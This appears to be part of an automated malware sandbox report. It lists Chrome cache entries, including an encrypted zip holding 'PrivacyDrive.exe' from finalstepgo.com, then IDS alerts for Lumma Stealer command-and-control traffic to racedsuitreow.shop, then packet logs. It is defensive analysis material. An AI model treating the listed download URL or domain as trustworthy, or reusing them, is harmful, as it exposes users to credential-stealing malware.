MD5:	C299A572DF117831926BC3A0A25BA255
SHA1:	673F2AC4C7A41AB95FB14E2687666E81BC731E95
SHA-256:	F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
SHA-512:	B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
Malicious:	false
Reputation:	low
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 142

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133803
Entropy (8bit):	5.435658401064262
Encrypted:	false
SSDEEP:	1536:4ye3yNbRQePwnWklJTaOVcDALzUm8yDzeROGjHfmdxY16NQn5oS8wmROLz6/n0kF:GiQVaOlLzwIzeROuH6Y1QamwLz6P0kF
MD5:	4DDDF0206615F0BC93CB18F112770997
SHA1:	E803FD50FADB96DC09277008A349C19829481165
SHA-256:	E7A902007E80E5F99B5552EB951C150182611D3DB28940B29395140CAAC736B3
SHA-512:	FEB8B4BD93186890CF4280EB2B5E11BEBC1A0A06BA0CC9B0F8774D8C823C0651AEC563548F11406F3465C53852931672A3DA12873817017DFF6DD72F5E622911
Malicious:	false
Reputation:	low
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_3d gb_Re gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3533581296433415
Encrypted:	false
SSDEEP:	96:mtOTKb1db1ZlNY5co7sRxiU0rqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT6TUvBrqig7mIg8IB8u88DA
MD5:	6776548F23C2A44FBD3C7343F0CB43E1
SHA1:	1E6871D4196BB00F0D161D5DC8872A8D940CEC30
SHA-256:	DDFC74A717ADCA6E6DB1BCF58D64FF7205F52BA4B61617A0137045088622C86E
SHA-512:	947B3AC76BC7B6DF6FD1C4AEA94E79D1E168E3B15BB4DC2A497E3DAFF60DAA58A490C89BA11A10910BB4B21C79A56CEAEDFFAE32A77D39E245422BE874BF7CF1
Malicious:	false
Reputation:	low
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.4FdvxZCaxZc.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTtcPh2nad5bIFFLwCKDWaAzlQEIJA"
Preview:	.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_F .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_F .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_F .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	downloaded
Size (bytes):	1527814
Entropy (8bit):	7.997329416439085
Encrypted:	true
SSDEEP:	24576:qytEI+7yp9uF1/WztSxaCdN28SdKriek4qcYjjBiiJWn8HBgvLGTrFX:qpI8Yk1/WBSkWN32KrzJq0ii8hgvLG1X
MD5:	BB9EB573EAE8B10C74BCBFF43C81D5DB
SHA1:	79D70041A7410F018169C265307E7E73515EDBB8
SHA-256:	793BC2F7A3FE1FBE2E4E8960A8C9E42671842ABB38399EB96E2AD601E8733529
SHA-512:	68E228C1DA9ADD467D3C3C354D9BF21C8387869A02647A8DC440FABC223294B354FA437E66A330A5CCBCC20E3614FCAD0BE595382BBE4FD88CABEFAC83F2F0E9
Malicious:	false
Reputation:	low
URL:	https://finalstepgo.com/uploads/il222.zip
Preview:	PK........c5:YN+G)`O....+.....PrivacyDrive.exe.}.\TE...e..WvQPJT.,.0.44A]D...Y....n.%.b.J...i..a.S.Yi......J.ffij>V...4EC.;g........>....O.s..9s.3g..&M\..0........3._,......u.......[.,.n.M/...=#...#.{...f[".=..m})."F.M.xq.....m.....>..P.(..^...0y..,.....\|.<.....Kg.v...?.p}?...N.M....8...k.............!,$....9..L.ns}...&Q.`.m.\|..w..!k#Sa..2..`.w...a4@.PJ=H.....g...&...Mo...0K...iQ..~. SG2..f..........e.2..[6'.sL1.Y~....<.c...y(E......`..}..?ky.aN...}.~C.........t(y.aj.............J}...>...._...j.i..df.&x..6E.Ld...s...7C.CW...D.?.3.fH9t...g..Ja.D....Q......>..4..B../xE....;..PZ...Tq~.#.fuKaL..C50.P...G..yA..<\|.b..c.p.S4o...5..%..}g..@.-.........>.....:x..42......b..#..... mo........~.[{.M....%..m.t.E.%...PP..G....J.2...}...p.\|....[J%c....{.N.....[...Nd.{..V..~uO.l.\.....W..93Ln.fA.... moDk.[.=..wk/...{..L.{...hS...x(.....A...pM...B.S...x...j.'..O.?..h.U.S.t...ZQc....%.\|>62..G.Zcd...=...`U..z..`U.....O....af...a..+......[..@.h.....

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
Reputation:	low
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 146

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	low
URL:	https://finalstepgo.com/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	77550
Entropy (8bit):	6.091516642805451
Encrypted:	false
SSDEEP:	1536:u3a7fIl1DLhCqyyW3UvSHk3a7fIl1DLhCqyyW3UvSHH/4CX6tM:MJ1HhCV3THyJ1HhCV3THHQo6tM
MD5:	A91DF97DD225093A187F389835F7E6F2
SHA1:	269F24C6AEBC6F56C62E81474C50B05103CC7FCF
SHA-256:	01D8D43A9733D1DDA72F5A005A86A4C0C4465E49047E0A0156F13DFB37C12D12
SHA-512:	E6628F9C80B6A2CEE69FDE2C2E348E4F42FD34E5A2B21FFFC1A96FE15E4A94E247F0E5F2E7040645640B2BD0522D77A96C063088FCD97F4782229709833BC160
Malicious:	false
Reputation:	low
URL:	https://www.google.com/async/ddljson?async=ntp:2
Preview:	)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Celebrating Popcorn","cta_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAawAAADICAMAAACDBCVmAAADAFBMVEUAAADDh4JuFz9VJlehMD/TaC6YGy7BUkbifid5CyeJDTA6BD+EByw9AUAyBzgtB0ItDkY4CkhCBkhKA0mEDjWKETWMEjSbJT+bGC2uISO0KSWrNBy4NSm3LyZQAkp0DDxgB0OTFDGkHCjURh/LYR7VayHFNiC7OirykwvhiArDRivujAmnLTHcehpVHR1fHAxpHgN0HCe9QSyYGjnqbA1iFwBhJRljHyNgMEJaQVZbPXZcQH2MIDtgLyv0oBbmhhzFTi7JVC6kVURyJwRcEQDLWjF7MAeiSxW6Xx3slibKdiOPRBHumijwoCyuVhqJPAPOYTLRaDPDciPVbzVqUFtiRInTfQmuXQf0rR7YdjeZRzOFNg/1tAK2fCKVVxvbfjjkdij6xhT6xzHepTTCiybugizghzqEwOZuntRuf6D6uyb+0Tn90ErysTajYh7ypzHkkT3omj7zoDloS5qP0/NwqOFoVm7+2j37wkbsokDfWyN/hZVub4H9yEr5tjzvqkL/vTn4vkVUDAD/4kG9nzhLMA81Hwl4VybnxEcCAgEfDQA7KBYfGwzatT3/102ubSXlxGj/23fEolOWeDTTr1751HP+xmqlgj7/sRb3uEZjSx/zsUT/tGXwrl7vkzmbO2r+oEJELijDey/0iC13XInQYQS1aVLfgCz/zliHZjH/5FbrtJeMbVswGgI/IQdZPBX94a1ONj3bp0n8qz378NJzQxhHHhL00KWcT4XOzLsoFQA/PHNLYZbvmi5pQz//3nq/cmM8b8ApYbguQo5FMleflY5CcbweXr4hSa//6H//43uyjEn6mUAeTLfQk

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T17:42:08.667321+0200	2056078	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)	1	192.168.2.17	54889	1.1.1.1	53	UDP
2024-09-26T17:42:09.149185+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.17	49738	172.67.206.221	443	TCP
2024-09-26T17:42:09.309602+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.17	49738	172.67.206.221	443	TCP
2024-09-26T17:42:09.309602+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.17	49738	172.67.206.221	443	TCP
2024-09-26T17:42:09.882537+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.17	49739	172.67.206.221	443	TCP
2024-09-26T17:42:10.381763+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.17	49739	172.67.206.221	443	TCP
2024-09-26T17:42:10.381763+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.17	49739	172.67.206.221	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:40:42.080916882 CEST	49677	443	192.168.2.17	204.79.197.200
Sep 26, 2024 17:40:42.080916882 CEST	49678	443	192.168.2.17	204.79.197.200
Sep 26, 2024 17:40:42.080940008 CEST	49676	443	192.168.2.17	204.79.197.200
Sep 26, 2024 17:40:44.918493986 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.918534040 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:44.918605089 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.918936014 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.918977976 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:44.919047117 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.919204950 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.919224977 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:44.919454098 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:44.919467926 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.761876106 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.761945963 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.762407064 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.762439966 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.762458086 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.762504101 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.764106035 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.764132977 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.764189005 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.764245987 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.765274048 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.765372992 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.765481949 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.765491962 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.765566111 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.765662909 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.816893101 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.816931963 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:45.816968918 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:45.864918947 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.085148096 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.085237026 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.085335016 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.086060047 CEST	49706	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.086081982 CEST	443	49706	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.140913010 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.187412977 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.363570929 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.363672018 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:46.363902092 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.364424944 CEST	49707	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:40:46.364455938 CEST	443	49707	185.255.122.133	192.168.2.17
Sep 26, 2024 17:40:48.450680971 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:48.450726986 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:48.450803995 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:48.451092005 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:48.451102972 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.102391958 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.102749109 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:49.102773905 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.103805065 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.103895903 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:49.104974985 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:49.105073929 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.159929037 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:49.159964085 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:49.207967043 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:52.995896101 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:52.995955944 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:52.996076107 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.017179012 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.017199993 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:53.810944080 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:53.811062098 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.813438892 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.813457012 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:53.813771009 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:53.868947983 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.920151949 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:53.967408895 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177035093 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177062035 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177068949 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177109957 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177129030 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177136898 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177145004 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.177175045 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.177194118 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.177227974 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.178004980 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.178072929 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.178081036 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.178128958 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.181921959 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.224189043 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.224231958 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:54.224248886 CEST	49710	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:40:54.224256992 CEST	443	49710	4.175.87.197	192.168.2.17
Sep 26, 2024 17:40:55.592639923 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:40:55.908031940 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:40:56.508107901 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:40:57.708998919 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:40:59.031522989 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:59.031589985 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:40:59.031666040 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:59.762574911 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:40:59.969146967 CEST	49709	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:40:59.969224930 CEST	443	49709	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:00.062144041 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:00.109998941 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:41:00.668030024 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:01.880985975 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:02.646599054 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:02.646636009 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:02.646732092 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:02.647716999 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:02.647728920 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.429307938 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.429384947 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.434336901 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.434362888 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.434657097 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.476016045 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.562490940 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.607402086 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.994143009 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.994296074 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.994359016 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.994400024 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:03.994432926 CEST	49715	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:03.994441986 CEST	443	49715	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.039921999 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.039969921 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.040065050 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.040322065 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.040338039 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.289017916 CEST	49680	443	192.168.2.17	20.189.173.13
Sep 26, 2024 17:41:04.755665064 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.755778074 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.757211924 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.757229090 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.757473946 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.759001970 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:04.799410105 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:04.910041094 CEST	49675	443	192.168.2.17	204.79.197.203
Sep 26, 2024 17:41:05.047147989 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:05.047352076 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:05.047485113 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:05.048264980 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:05.048290968 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:05.048309088 CEST	49716	443	192.168.2.17	184.28.90.27
Sep 26, 2024 17:41:05.048316002 CEST	443	49716	184.28.90.27	192.168.2.17
Sep 26, 2024 17:41:08.211281061 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:08.514054060 CEST	49682	80	192.168.2.17	192.229.211.108
